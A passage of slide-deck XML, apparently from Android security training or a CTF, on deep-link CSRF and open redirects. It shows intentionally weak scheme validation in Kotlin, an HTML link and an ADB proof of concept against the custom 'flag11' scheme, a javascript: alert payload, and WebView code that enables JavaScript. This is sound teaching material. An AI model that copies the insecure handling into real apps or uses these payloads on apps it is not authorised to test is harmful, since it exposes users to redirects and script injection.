              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="146" name="Google Shape;146;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="420975" y="2147188"/>
            <a:ext cx="3896599" cy="381950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Google Shape;147;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="387400" y="3269850"/>
            <a:ext cx="3963750" cy="542688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p27"/>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Deep Link CSRF Examples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311700" y="7610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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Schema in an intent-filter only specified with a scheme in AndroidManifest.xml</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;intent-filter&gt;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&lt;action</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android:name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"android.intent.action.VIEW"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;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&lt;category</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android:name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"android.intent.category.DEFAULT"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;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&lt;category</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android:name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"android.intent.category.BROWSABLE"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;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&lt;data</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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>android:scheme=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"flag11"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;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&lt;/intent-filter&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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Further investigate Activity class in this case “DeepLinkActivity”.</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Activity validation that only requires a specific protocol. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom schema may be converted to match web application protocol</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="160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highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>val</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highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>intentToUri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>getIntent()</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="DD1144"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>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highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> val</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highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>intentToUri.data</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="DD1144"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>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highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>val</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highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>appSchema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>flag11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>" == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>data.getScheme()</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="DD1144"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>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t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>appSchema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>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t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>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0080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>val</a:t>
            </a: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highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>convertScheme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>data.host</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="DD1144"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>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t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>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008080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>startActivity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(Intent(Intent.ACTION_VIEW, Uri.parse(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>convertScheme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>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457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100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  </a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>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sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p28"/>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Deep Link Open Redirects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Proof of concept with html</a:t>
            </a:r>
            <a:endParaRPr>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&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;a href="flag11://google.com"&gt;Open Redirect PoC&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proof of concept with ADB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adb shell am start -W -a android.intent.action.VIEW -d "flag11://google.com"</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p29"/>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Deep Link Open Redirect Example</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7873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rPr>
              <a:t>Possible if schema, host, and url parameters aren’t validated.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some cases javascript:alert(“PoC”); will work if any schema is accepted</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Look for addJavascriptInterface and setJavaScriptEnabled(true);</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Android doesn’t enable javascript by default. When a mobile application needs to interact with a Web application this is where javascript is sometimes enabled for compatibility with WebViews.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Defined Webview</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="A9B7C6"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="2B2B2B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebView flagWebView = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WebView(this);</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setContentView(flagWebView);</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flagWebView.getSettings().setJavaScriptEnabled(true);</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flagWebView.setWebChromeClient(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
